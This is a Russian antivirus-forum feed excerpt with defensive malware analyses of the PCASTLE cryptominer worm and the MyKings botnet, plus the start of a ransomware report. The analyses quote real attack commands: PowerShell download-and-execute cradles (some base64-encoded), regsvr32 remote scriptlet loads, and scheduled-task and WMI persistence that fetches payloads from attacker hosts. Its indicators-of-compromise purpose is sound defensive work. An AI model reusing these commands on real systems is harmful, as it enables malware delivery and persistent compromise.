/>ESET Endpoint Antivirus/Endpoint Security for macOS<br />ESET Cyber Security/Cyber Security Pro<br />DEM for ConnectWise Automate<br />DEM for (Solarwinds) N-able<br />DEM for (Solarwinds) RMM<br />DEM for NinjaOne<br />DEM for Datto<br />PSA Plugins <br /><br />Облачные продукты:<br /><br />ESET PROTECT Cloud (former ESET Cloud Administrator)<br />ESET Enterprise Inspector Cloud<br />ESET Cloud Office Security<br />RMM for Kaseya<br />ESET Secure Authentication Cloud <br /><br />Продукты для шифрования: <br /><br />ESET Endpoint Encryption<br />ESET Endpoint Encryption for macOS<br />ESET Endpoint Encryption Server<br />ESET Full Disk Encryption<br />ESET Full Disk Encryption for macOS<br /><br />Порталы: <br /><br />ESET Business Accounts<br />ESET MSP Administrator<br />ESET License Administrator<br />ESET HOME<br /><br />Инструменты / Другое: <br /><br />ESET Shared Local Cache<br />Rogue Detection Sensor<br />Remote Deployment Tool<br /><br /><noindex><a href="https://support.eset.com/en/alert8188-information-regarding-the-log4j2-vulnerability" target="_blank" rel="nofollow">https://support.eset.com/en/alert8188-information-regarding-the-log4j2-vulnerability</a></noindex> <br />
			<i>17.12.2021 12:59:29, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16665/message113510/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16665/message113510/</guid>
			<pubDate>Fri, 17 Dec 2021 12:59:29 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Червь-криптомайнер PS1.PCASTLE</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16580/message113145/">Червь-криптомайнер PS1.PCASTLE</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			В одной из задач по очистке заражений в локальной сети столкнулись с периодическим запуском в системе powershell, и детектированием вредоносного действия установленным антивирусом. однако в логи антивируса указывается только powershell.exe и целевой адрес. Поскольку процессы запуска системе были кратковременными в образ автозапуска данное событие было зафиксировано лишь через отслеживание процессов и задач без учета цели и cmdline.<br /><br /> &nbsp; &nbsp;<br />====quote====<br />Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE<br /> &nbsp; &nbsp;Имя файла POWERSHELL.EXE<br /> &nbsp; &nbsp;Цифр. подпись Действительна, подписано Microsoft Windows<br /> &nbsp; &nbsp;Оригинальное имя PowerShell.EXE.MUI<br /> &nbsp; &nbsp;Версия файла 6.3.9600.17396 (winblue_r4.141007-2030)<br /> &nbsp; &nbsp;Описание Windows PowerShell<br /> &nbsp; &nbsp;Производитель Microsoft Corporation<br /><br /> &nbsp; &nbsp;Доп. информация на момент обновления списка<br /> &nbsp; &nbsp;pid = 5100 NT AUTHORITY\СИСТЕМА<br /> &nbsp; &nbsp;Процесс создан 08:20:00 [2021.09.14]<br /> &nbsp; &nbsp;Процесс завершен 08:20:01 [2021.09.14]<br /> &nbsp; &nbsp;parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE<br /> &nbsp; &nbsp;pid = 4724 NT AUTHORITY\СИСТЕМА<br /> &nbsp; &nbsp;Процесс создан 08:20:00 [2021.09.14]<br /> &nbsp; &nbsp;Процесс завершен 08:20:00 [2021.09.14]<br /> &nbsp; &nbsp;parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE<br /> &nbsp; &nbsp;pid = 5496 NT AUTHORITY\СИСТЕМА<br /> &nbsp; &nbsp;Процесс создан 08:10:00 [2021.09.14]<br /> &nbsp; &nbsp;Процесс завершен 08:10:01 [2021.09.14]<br /> &nbsp; &nbsp;parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE<br />=============<br /><br /><br />после включение записи лога DNS стали известны целевые адреса:<br /><br /> <br />====quote====<br /> &nbsp; T[.]ZER2[.]COM, V[.]Y6H[.]NET<br />=============<br /><br />далее, <B>разработчик uVS добавил функцию обнаружения cmdline по закрытым процессам</B> и картина атаки резко прояснилась - было зафиксировано через powershell два варианта запуска:<br /><br /><br />====quote====<br />C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -c "IEX(New-Object System.Net.WebClient).DownloadString("http://t[.]zer2[.]com/ipc.jsp?h")"<br />=============<br /><br />и<br /><br /><br />====quote====<br />C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBi<WBR/>&shy;AEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcA<WBR/>&shy;KAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdwBt<WBR/>&shy;AD8AcwBtAGIAJwApAA==<br />=============<br /><br /><img src="https://chklst.ru/uploads/editor/z2/2rl2adkha8u7.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />после декодирования строки:<br /><br /><br />====quote====<br />I&#65529;E&#65529;X&#65529; &#65529;(&#65529;N&#65529;e&#65529;w&#65529;-&#65529;O&#65529;b&#65529;j&#65529;e&#65529;c&#65529;t&#65529; &#65529;N&#65529;e&#65529;t&#65529;.&#65529;W&#65529;e&#65529;b&#65529;C&#65529;l&#65529;i&#65529;e&#65529;n&#65529;t&#65529;)&#65529;.&#65529;d&#65529;o&#65529;w&#65529;n&#65529;l&#65529;o&#65529;a&#65529;d&#65529;s&#65529;t&#65529;r&#65529;i&#65529;n&#65529;g&#65529;(&#65529;'&#65529;h&#65529;t&#65529;t&#65529;p&#65529;:&#65529;/&#65529;/&#65529;v[&#65529;.]&#65529;b&#65529;e&#65529;a&#65529;h&#65529;h[&#65529;.]&#65529;c&#65529;o&#65529;m&#65529;/&#65529;w&#65529;m&#65529;?&#65529;s&#65529;m&#65529;b&#65529;'&#65529;)&#65529;<br />=============<br /><br />собственно, именно данный целевой адрес и детектировал антивирус:<br /><br />====quote====<br />10.09.2021 12:00:04 http[:]//v[.]beahh[.]com/wm?smb Blocked by internal blacklist C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe NT AUTHORITY\СИСТЕМА 72.52.178.23 9F1E24917EF96BBB339F4E2A226ACAFD1009F47B<br />=============<br /><br />родительский процесс (здесь 432) для процессов запуска powershell с указанным cmdline<br /><br /><img src="https://chklst.ru/uploads/editor/p9/psquwezo61py.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />поиск по известному cmdline позволил определить тип (<noindex><a href="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Trojan.PS1.PCASTLE.AF/" target="_blank" rel="nofollow">Trojan.PS1.PCASTLE</a></noindex>) и дополнительные детали вредоносного ПО, который распространился в сети:<br /><br /> &nbsp; &nbsp;The following {Task Name} - {Task to be run} listed should be used in the steps identified below:<br /><br /> <br />====quote====<br /> &nbsp; \\\Rtsa - powershell -nop -ep bypass -e {Base64 Encoded String}<br /> &nbsp; &nbsp;\\\Rtsa - powershell -nop -ep bypass -c ''IEX(New-Object System.Net.WebClient).DownloadString(\\"http[:]//t[.]zer2[.]com/ipc.jsp?h\\")''<br />=============<br /><br />и<br /><br /> &nbsp; &nbsp;"More advanced options" option to include all hidden files and folders in the search result.<br /><br /> <br />====quote====<br /> &nbsp; %Application Data%\sign.txt<br /> &nbsp; &nbsp;%Application Data%\flashplayer.tmp<br /> &nbsp; &nbsp;%User Startup%\run.bat<br /> &nbsp; &nbsp;%User Startup%\FlashPlayer.lnk<br /><br />=============<br /><br />данные файлы были найдены в карантине антивируса:<br /><br /><br />====quote====<br /> &nbsp; &nbsp;7F450F8583BA949317E8FA47E1B745CEC6CE242E.NDF "C:\Users\***\AppData\Roaming\flashplayer.tmp";"C:\Users\****\AppData\Roaming\flashplayer.tmp" "@NAME=PowerShell/TrojanDownloader.Agent.DV@TYPE=Trojan@SUSP=inf" ****** 221 bytes<br /><br /> &nbsp; &nbsp;896C398162D9175E7B6736DE39710ED8385C9DC2.NDF "c:\users\***\appdata\roaming\microsoft\windows\start menu\programs\startup\flashplayer.lnk";"C:\users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk";"C:\users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk" "@NAME=LNK/Agent.GY@TYPE=Trojan@SUSP=inf" 774 bytes<br /><br /> &nbsp; &nbsp;A33C1553998CCC0B1FF1F2A91BBB1A53B686AC13.NDF "C:\Windows\System32\Tasks\Rtsa" "@NAME=PowerShell/TrojanDownloader.Agent.CEJ@TYPE=Trojan@SUSP=inf" **** 2066 bytes<br />=============<br /><br /><br />некоторые детали данного червя<br /><br />некоторые детали:<br />URLs used by updated worms for infection<br /><br />http[:]//w.beahh.com/page.html<br />http[:]//v.beahh.com/<br /><br />PowerShell URLs:<br />Note that these are URL fragments, and more information is usually encoded in the query string.<br /><br />http[:]//v.y6h.net/g<br />http[:]//v.bddp.net/v<br />http[:]//v.bddp.net/wm<br /><br />Domains<br />Some domains have many subdomains.<br />For this reason, we will use a wildcard in place of the subdomain, as the entire domain is attacker-controlled.<br /><br />*.beahh[.]com<br />*.bddp[.]net<br />v.y6h[.]net<br />*.zer2[.]com<br />Scheduled task names:<br />\Microsoft\Windows\<br /><br /> &nbsp; &nbsp;Task: {36DAD069-B5EB-4EE4-A085-CB9540ED7B30} - \Microsoft\windows\Rass -&gt; Нет файла &lt;==== ВНИМАНИЕ<br /><br /><br />Filenames:<br />%APPDATA%\sign.txt<br />%APPDATA%\flashplayer.tmp<br />%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk<br /><br />Listening ports:<br />65530<br />65531<br />65532<br />65533<br /><br />TCP traffic on ports:<br />This will appear as open port checks (TCP SYN packet, followed either by a TCP RST from the target machine, or a 3-way handshake followed by a graceful shutdown)<br />65530<br />65531<br />65532<br />65533<br /><br />Firewall rules:<br />DNS (allow TCP port 65531)<br />DNSS2 (allow TCP port 65531)<br />DNS2 (allow TCP port 65532)<br />DNSsql (allow TCP port 65533)<br />DNSd (allow TCP port 65533)<br />DNSS3 (allow TCP port 65533)<br /><br />User accountsWindows user account: “k8h3d”, password “k8d3j9SjfS7”<br />SQL Server account: “sa”, password “ksa8hd4,m@~#$%^&*()”(Note: “sa” is a legitimate account, but the password above is not.)<br /><br /><br />детальное описание червя-майнера c использованием экспойтов АНБ PS1.PCASTLE от BitDefender<br /> <noindex><a href="https://www.bitdefender.com/files/News/CaseStudies/study/280/Bitdefender-WhitePaper-Worm-Cryptominer-Beapy-PCASTLE.pdf" target="_blank" rel="nofollow"><B>здесь</B></a></noindex> <br />
			<i>11.10.2021 13:37:17, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16580/message113145/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16580/message113145/</guid>
			<pubDate>Mon, 11 Oct 2021 13:37:17 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>MyKings: медленный, но неустанный рост ботнета</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16539/message113002/">MyKings: медленный, но неустанный рост ботнета</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<B>SophosLab</B> ранее опубликовал детальный отчет о работе ботнета Mykings, который возможно и стоит за многими атаками на системы с использованием EternalBlue NSA exploit, инструментария WMI для обновления и экплуатации систем с целью майнинга криптовалют, буткита для закрепления устойчивой работы бэкдора и майнеров и др.<br /><br /><B>MyKings: медленный, но неустанный рост ботнета<br /></B><br /> &nbsp; &nbsp;Ботнет <B>MyKings</B> имеет широкую ряд автоматизированных методов взлома серверы - все для установки майнера криптовалюты.<br /><br />Вступление<br /><br />Ботнет <B>MyKings / DarkCloud / Smominru</B> (который мы будем называть MyKings) был активен в течение двух лет. Хотя отдельные модули были описаны в нескольких публикациях, в прошлом эта статья не фокусировалась на глубоком анализе отдельных используемых вредоносных компонентов. во время активности. Здесь мы смотрим на взаимодействие между различными элементами инструментов, используемыми злоумышленников MyKings и их роли в процессе заражения, чтобы получить полную картину работа ботнета. Ботнет обычно доставляет криптомайнеры и трояны удаленного доступа (RAT). Недавно злоумышленники, стоящие за MyKings, добавили функциональность буткита, чтобы избежать обнаружения и установить постоянство это трудно удалить или смягчить. Самая ранняя активность MyKings датируется 2016 годом, и с тех пор она активна, но мы обнаружили некоторые пересекаются в образцах и серверной инфраструктуре с более ранней кампанией.<br /><br />Основные выводы этого исследования заключаются в следующем:<br /><br />* Ботнет распространяется путем атаки на слабые комбинации имени пользователя и пароля в MySQL, MSSQL, telnet, ssh, IPC, WMI, RDP, а также дополнительно использует EternalBlue для бокового движения.<br /><br />* Во время начальных процессов заражения ботнет защищает компьютер; удаляет процессы, файлы и настройки, принадлежащие семействам вредоносных программ, управляемые другими угрозами актеры; и закрывает коммуникационные порты, которые могут быть использованы для повторного заражения компьютера.<br /><br />Злоумышленники, стоящие за этим ботнетом, предпочитают использовать открытый исходный код или другое доступное ПО и обладают достаточными навыками, чтобы вносить изменения и улучшения в исходный код.<br /><br />Основными целями ботнета являются страны Азии, но мы можем найти инфекции повсюду.<br /><br />В число наиболее инфицированных стран входили:<br /><br />* Китай * Тайвань * Россия * Бразилия * США * Индия * Япония<br /><br />Процесс заражения<br /><br />Компоненты ботнета очень взаимосвязаны, и существует множество возможных путей или способв заражений.<br /><br />ok.exe - установщик буткита Ботнет MyKings начал интенсивно использовать компоненты буткита в начале 2019 года. Однако первые версии установщика буткита датируются июнем 2018 г.<br /><br />Наиболее распространенный вариант попадал в зараженные системы с именами файлов ok.exe или max.exe.<br /><br />Установщики буткитов обычно защищены с помощью VMProtect, что делает более сложным точный анализ.<br /><br />Это характерно для ботнета: есть несколько компонентов, каждый из которых они делают очень похожую процедуру самообновления. Таким образом, даже если большинство компонентов ботнет удаляется с компьютера, остальные имеют возможность восстановить его до полной силы.<br /><br />Он выполняет поиск в списке запущенных процессов и завершает те, которые связаны с продуктами безопасности, используя жестко запрограммированный список имен.<br /><br />c3.bat - это компонент, который завершает процесс заражения. Это относительно большой командный файл; В размер варьируется, но обычно он составляет от 3 000 до 20 000 байт. Он запускает несколько десятков процессов по мере выполнения своей задачи - загрузки обновлений, установки. компоненты, устанавливая стойкость и очищая все следы, которые были созданы во время начальный процесс заражения. Это наиболее часто используемый компонент кампаний, было несколько десятков его вариантов. обнаружено, что они отличались в незначительных деталях, таких как список уничтожения или имена учетных записей пользователей. Обычно он устанавливается из самораспаковывающихся архивов RAR, содержащих два файла, n.vbs и c3.bat.<br /><br />Криптомайнинг - ресурсоемкий процесс, на компьютере есть место только для одного. MyKings пытается убедиться, что ему не нужно делить драгоценный процессор с другими майнерами - даже если они дружеские. Многие имена процессов используются более старыми версиями ботнета MyKings, поэтому этот механизм также может служить частью процесса обновления. Обратите внимание, что более старые версии майнеров, вероятно, использовали более старые (и уже заблокированы) идентификаторы кошельков, которые бесполезны. Список убитых процессов со временем менялся<br /><br />Некоторые имена используются чаще, другие могут быть связаны с конкретными угрозами, например:<br /><br /><br />====quote====<br /> &nbsp; &nbsp;doc001.exe (майнер XMRig)<br /> &nbsp; &nbsp;docv8.exe (майнер XMRig)<br /> &nbsp; &nbsp;wodCmdTerm.exe (майнер XMRig)<br /> &nbsp; &nbsp;NsCpuCNMiner64.exe (CNMiner)<br /> &nbsp; &nbsp;tlscntr.exe (майнер XMRig)<br /> &nbsp; &nbsp;ctfmonc.exe (майнер XMRig)<br /> &nbsp; &nbsp;wuauser.exe (майнер XMRig)<br /> &nbsp; &nbsp;mscsuscr.exe (майнер XMRig)<br /> &nbsp; &nbsp;Pviunc.exe (майнер XMRig)<br /> &nbsp; &nbsp;Bllianc.exe (майнер XMRig)<br /> &nbsp; &nbsp;dether.exe (майнер XMRig)<br /><br />=============<br /><br />Правила межсетевого экрана<br /><br />Пакетный файл изменяет правила брандмауэра. Цель состоит в том, чтобы закрыть порты, которые использовались для первоначального инфекции или могут быть использованы для последующих инфекций. Таким образом ботнет защищает себя от враждебных захват, обезопасив зараженный компьютер. Он создает новые правила брандмауэра, которые блокируют доступ к зараженному компьютеру на портах 135, 137, 138, 139 и 445 (относится к таким службам, как RPC, NetBIOS и Active Directory). Это закрывает возможность повторное заражение с помощью эксплойта RDP или EternalBlue.<br /><br />Обновление компонентов<br /><br />Скрипт скачивает с сайтов обновлений ряд различных скриптов, например:<br /><br /><br />====quote====<br /> &nbsp; &nbsp;powershell.exe IEX (New-Object<br /> &nbsp; &nbsp;system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powershell.exe IEX<br /> &nbsp; &nbsp;(New-Object<br /> &nbsp; &nbsp;system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershell.exe IEX<br /> &nbsp; &nbsp;(New-Object system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32 /u<br /> &nbsp; &nbsp;/s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll&regsvr32 /u /s<br /> &nbsp; &nbsp;/i:hxxp://173.208.139[.]170/2.txt scrobj.dll&regsvr32 /u /s /i:hxxp://35.182.171[.]137/3.txt<br /> &nbsp; &nbsp;scrobj.dll"<br />=============<br /><br />Роль загружаемых файлов следующая:<br />• s.ps1: завершает все процессы svchost.exe и conhost.exe, которые не выполняются из системный каталог и выполняет c: \ windows \ temp \ conhost.exe<br />• s.txt: скрипт сбора информации<br />• s.jpg: убивает процессы, связанные с майнером, и определяет правила брандмауэра.<br />• 1.txt: загружает компоненты PE (обычно установщик буткита и дроппер c3.bat).<br />• 2.txt: список URL-адресов для компонентов.<br /><br />Загружается несколько различных компонентов, и используются несколько методов сохранения, чтобы убедиться, что буткит переживает перезагрузку на компьютере<br /><br />Устойчивость<br /><br />Пакетный сценарий использует несколько различных методов для достижения устойчивости и выживаемости после загрузки системы<br /><br />Буткит<br /><br />Компонент буткита - это первый из методов сохранения. Поскольку в IPL перезаписывается вредоносный код, он будет выполняться при каждой перезагрузке, а также загружает и запускает компоненты ботнета.<br /><br />Ключи автозапуска в реестре<br /><br />В дополнение к этому пакетный файл создает ключ автозапуска реестра, который использует regsvr32.exe для извлечения и выполнения обновления, в данном случае v.sct, который представляет собой простой скриптлет, загружающий компоненты Win32.<br /><br /> &nbsp;<br />====quote====<br /> &nbsp;reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d<br /> &nbsp; &nbsp;"regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f<br /><br /> &nbsp; &nbsp;reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\<WBR/>&shy;Run" /v<br /> &nbsp; &nbsp;"start" /d "regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f<br />=============<br /><br /><br /><br />Задачи по расписанию<br /><br />Некоторые компоненты прописаны в отдельную задачу. Названия задач обычно:<br />ok, Mysa, Mysa1, Mysa2 и Mysa3.<br /><br />Запланированные задачи выполняются при запуске системы с помощью командной строки, которая подключается к ftp-серверу. и скачивает обновление, в случае задачи Mysa исполняемый файл будет сохранен как a.exe<br /><br /> &nbsp;<br />====quote====<br /> &nbsp;schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.1226bye[.]xyz&gt;s&echo<br /> &nbsp; &nbsp;test&gt;&gt;s&echo 1433&gt;&gt;s&echo binary&gt;&gt;s&echo get a.exe c:\windows\update.exe&gt;&gt;s&echo<br /> &nbsp; &nbsp;bye&gt;&gt;s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F<br /><br /> &nbsp; &nbsp;schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.1226bye[.]xyz&gt;p&echo<br /> &nbsp; &nbsp;test&gt;&gt;p&echo 1433&gt;&gt;p&echo get s.dat c:\windows\debug\item.dat&gt;&gt;p&echo bye&gt;&gt;p&ftp<br /> &nbsp; &nbsp;-s:p" /ru "system" /sc onstart /F<br /><br /> &nbsp; &nbsp;schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.1226bye[.]xyz&gt;ps&echo<br /> &nbsp; &nbsp;test&gt;&gt;ps&echo 1433&gt;&gt;ps&echo get s.rar c:\windows\help\lsmosee.exe&gt;&gt;ps&echo<br /> &nbsp; &nbsp;bye&gt;&gt;ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F<br />=============<br /><br />Запланированные задачи обычно загружают дополнительные компоненты через ftp-соединение, в данном конкретном случае. бэкдор Forshare и майнер.<br /><br />Затем другой набор задач запускает загруженный файл ok.dat, который является файлом DLL Windows, поэтому сценарий выполняет экспорт ServiceMain с параметром aaaa. Этот компонент является бэкдором PCShare.<br /><br />====quote====<br /><br /> &nbsp; &nbsp;schtasks / create / tn "Mysa1" / tr "rundll32.exe c: \ windows \ debug \ item.dat, ServiceMain aaaa "/ ru" system "/ sc onstart / F schtasks / create / tn "ok" / tr "rundll32.exe c: \ windows \ debug \ ok.dat, ServiceMain aaaa "/ ru" система "/ sc onstart / F<br />=============<br /><br /><br /><br />сценарии WMI<br /><br />Третий метод использует фильтры WMI для установления исполнения.<br /><br />c3.bat сначала удаляет следующие сценарии событий WMI, созданные более ранней версией ботнета:<br /><br /> <br />====quote====<br /> &nbsp; • fuckyoumm2_filter<br /> &nbsp; &nbsp;• fuckyoumm2_consumer<br /> &nbsp; &nbsp;• fuckayoumm3<br /> &nbsp; &nbsp;• fuckayoumm4<br /> &nbsp; &nbsp;• Windows Events Consumer<br /> &nbsp; &nbsp;• Windows Events Consumer4<br /> &nbsp; &nbsp;• Windows Events Filter<br />=============<br /><br /><br />Затем регистрирует новый фильтр с именем fuckyoumm4, который выполняется каждые 3 часа (10800 секунд).<br /><br /> &nbsp; <br />====quote====<br /> wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3",<br /> &nbsp; &nbsp;EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM<br /> &nbsp; &nbsp;__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA<br /> &nbsp; &nbsp;'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\\root\subscription"<br /> &nbsp; &nbsp;PATH CommandLineEventConsumer CREATE Name="fuckyoumm4",<br /> &nbsp; &nbsp;CommandLineTemplate="cmd /c powershell.exe -nop -enc<br /> &nbsp; &nbsp;"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgB<WBR/>&shy;OAGUAdAAuAFcAZQBiA<br /> &nbsp; &nbsp;EMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAa<WBR/>&shy;QBuAGcAKAAnAGgAdAB0<br /> &nbsp; &nbsp;AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIA<WBR/>&shy;LgB0AHgAdAAnACkALgB<br /> &nbsp; &nbsp;0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACc<WBR/>&shy;AfAAlAHsAJABuAD0AJA<br /> &nbsp; &nbsp;BfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG<WBR/>&shy;8AdwBuAGwAbwBhAGQAR<br /> &nbsp; &nbsp;gBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9A<WBR/>&shy;A=="&powershell.ex<br /> &nbsp; &nbsp;e IEX (New-Object<br /> &nbsp; &nbsp;system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powersh<br /> &nbsp; &nbsp;ell.exe IEX (New-Object<br /> &nbsp; &nbsp;system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershe<br /> &nbsp; &nbsp;ll.exe IEX (New-Object<br /> &nbsp; &nbsp;system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32<br /> &nbsp; &nbsp;/u /s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll&regsvr32 /u /s<br /> &nbsp; &nbsp;/i:hxxp://173.208.139[.]170/2.txt scrobj.dll&regsvr32 /u /s<br /> &nbsp; &nbsp;/i:hxxp://35.182.171[.]137/3.txt scrobj.dll"&wmic<br /> &nbsp; &nbsp;/NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE<br /> &nbsp; &nbsp;Filter="__EventFilter.Name="fuckyoumm3"",<br /> &nbsp; &nbsp;Consumer="CommandLineEventConsumer.Name="fuckyoumm4""<br /><br />=============<br /><br />Это код события - зашифрованная команда PowerShell, которая загружает текстовый файл с URL-адреса.<br /><br /> &nbsp; <br />====quote====<br /> hxxp: //wmi.1217bye [.] host / 2.txt (URL-адрес может со временем измениться).<br /><br /> &nbsp; &nbsp;$wc=New-Object<br /> &nbsp; &nbsp;System.Net.WebClient;$wc.DownloadString('hxxp://wmi.1217bye[.]host/2.txt').trim(<br /> &nbsp; &nbsp;) -split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;}<br /><br />=============<br />Содержимое этого файла должно содержать список URL-адресов следующего этапа, которые загружаются и выполнен. Пример содержимого файла 2.txt был следующим:<br /><br /> &nbsp;<br />====quote====<br /> &nbsp;hxxp://173.247.239[.]186/ok.exe<br /> &nbsp; &nbsp;hxxp://173.247.239[.]186/upsupx.exe<br /> &nbsp; &nbsp;hxxp://173.247.239[.]186/u.exe<br />=============<br /><br />Дополнительные три команды в сценарии WMI загружают еще три компонента:<br /><br /> &nbsp; <br />====quote====<br /> hxxp://173.208.139[.]170/s.txt<br /> &nbsp; &nbsp;hxxp://35.182.171[.]137/s.jpg<br /> &nbsp; &nbsp;hxxp://wmi.1217bye[.]host/S.ps1<br />=============<br /><br />Здесь s.txt - это сценарий PowerShell, который загружает файл списка уничтожения из hxxp: //139.5.177 [.] 19 / l.txt.<br /><br />Этот файл содержит список имен процессов; сценарий останавливает каждый процесс в этом списке:<br /><br /> &nbsp;<br />====quote====<br /> &nbsp;lsmose.exe,C:\Windows\debug\lsmose.exe,1<br /> &nbsp; &nbsp;lsmos.exe,C:\Windows\debug\lsmos.exe,1<br /> &nbsp; &nbsp;lsmo.exe,C:\Windows\debug\lsmo.exe,1<br /> &nbsp; &nbsp;csrw.exe,C:\Program Files (x86)\Common Files\csrw.exe,119<br /> &nbsp; &nbsp;csrw.exe,C:\Program Files\Common Files\csrw.exe,1<br /> &nbsp; &nbsp;lsmosee.exe,c:\windows\help\lsmosee.exe,1<br /> &nbsp; &nbsp;csrs.exe,c:\csrs.exe,1<br />=============<br /><br /><br />В завершение c3.bat загружает и выполняет s.txt. Это извлекает список уничтожения и останавливает процессы указанный в нем, а также дополнительно загружает и выполняет сценарий с именем up.txt. Это сценарий сбора информации, который собирает системную информацию (включая пароли, использующие Powerkatz) и загружает его на ftp-сервер 192.187.111.66, который был активным сервером сбора. на момент написания этого документа.<br /><br /><noindex><a href="https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophoslabs-uncut-mykings-report.pdf" target="_blank" rel="nofollow">полный отчет здесь</a></noindex> <br />
			<i>21.08.2021 13:32:22, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16539/message113002/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16539/message113002/</guid>
			<pubDate>Sat, 21 Aug 2021 13:32:22 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Расцвет и упадок многомиллионной бизнес-империи программ-вымогателей</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16490/message112744/">Расцвет и упадок многомиллионной бизнес-империи программ-вымогателей</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<B>Резюме:</B><br /><br />11 июня 2021 года программа-вымогатель <B>Avaddon</B>, ответственная за многочисленные киберинциденты с 2020 года, приняла решение не только приостановить свои операции, но и предоставить ключи дешифрования всем жертвам, которые стали их целью.<br /><br />Компания AdvIntel смогла добиться прозрачности виктимологии Avaddon, получив информацию об их мастер-ключе. Такая видимость всех жертв группы (а не только компаний, данные которых были официально размещены в блоге позора Аваддона) позволила получить уникальное представление о шаблонах, стратегиях и методах Авадона.<br /><br /><B>В ходе расследования виктимологии компания AdvIntel установила, что общий доход, полученный одним оператором за год деятельности Avaddon, потенциально может равняться 1 000 медианной заработной платы в России, что объясняет основу выкупа и то, почему она привлекает все больше и больше талантливых людей в разных странах.<br /></B><br />Согласно выводам AdvIntel, полученным в результате исчерпывающих расследований сообщества злоумышленников, гибель Avaddon, вероятно, была вызвана политическими причинами - резкой реакцией администрации президента США на недавние атаки программ-вымогателей и последующим давлением со стороны российских правоохранительных органов.<br /><br />Введение - Затерянная Империя<br /><br />Трехбуквенный еврейский корень «авад» (&#1488;&#1489;&#1491;), от которого произошло имя Аваддон, имеет два основных семантических толкования - <B>«разрушать» и «терять / теряться»</B>. Действительно, эти два значения идеально определяют программу-вымогатель Avaddon - разрушительную и вредоносную силу, которой всегда удавалось скрыться и исчезнуть.<br /><br />Сегодня мы проливаем свет на эту затерянную и скрытую преступную империю, используя уникальные наборы данных - полный список жертв Avaddon, когда-либо подвергавшихся нападениям группы за год ее существования, - обнаруженных AdvIntel. Эти уникальные данные SIGINT подтверждаются эксклюзивными выводами HUMINT - заявлениями, сделанными лидерами подпольного киберсообщества Восточной Европы, 